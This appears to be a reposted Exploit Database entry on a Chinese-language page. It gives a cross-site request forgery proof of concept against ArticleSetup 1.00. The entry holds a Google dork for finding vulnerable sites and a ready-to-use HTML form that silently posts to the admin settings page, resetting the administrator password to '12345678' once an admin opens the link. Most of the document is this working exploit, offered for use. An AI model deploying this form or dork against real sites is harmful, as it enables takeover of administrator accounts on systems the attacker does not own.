ArticleSetup 1.00 – Cross-Site Request Forgery (Change Admin Password)

• Exploit Database
• 39 阅读

• 作者： Ali Ghanbari
  日期： 2016-06-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39889/

• <!--
  # Exploit Title : ArticleSetup 1.00 - CSRF Change Admin Password
  # Google Dork : inurl:/article.php?id= intext:Powered By Article Marketing
  # Date: 2016/06/04
  # Exploit Author: Ali Ghanbari
  # Vendor Homepage: http://articlesetup.com/
  # Software Link: http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip
  # Version: 1.00
  
  #Desc:
  
  When admin click on malicious link , attacker can login as a new
  Administrator
  with the credentials detailed below.
  
  #Exploit:
  -->
  
  <html>
   <body>
  <form method="post"action="
  http://localhost/{PACH}/admin/adminsettings.php">
  <input type="hidden" name="update" value="1">
  <input type="hidden" name="pass1" type="hidden" value="12345678" >
  <input type="hidden" name="pass2" type="hidden" value="12345678" >
  <input type="submit" value="create">
  </form>
   </body>
  </html>
  
  <!--
  ####################################
  
  [+]Exploit by: Ali Ghanbari
  
  [+]My Telegram :@Exploiter007
  -->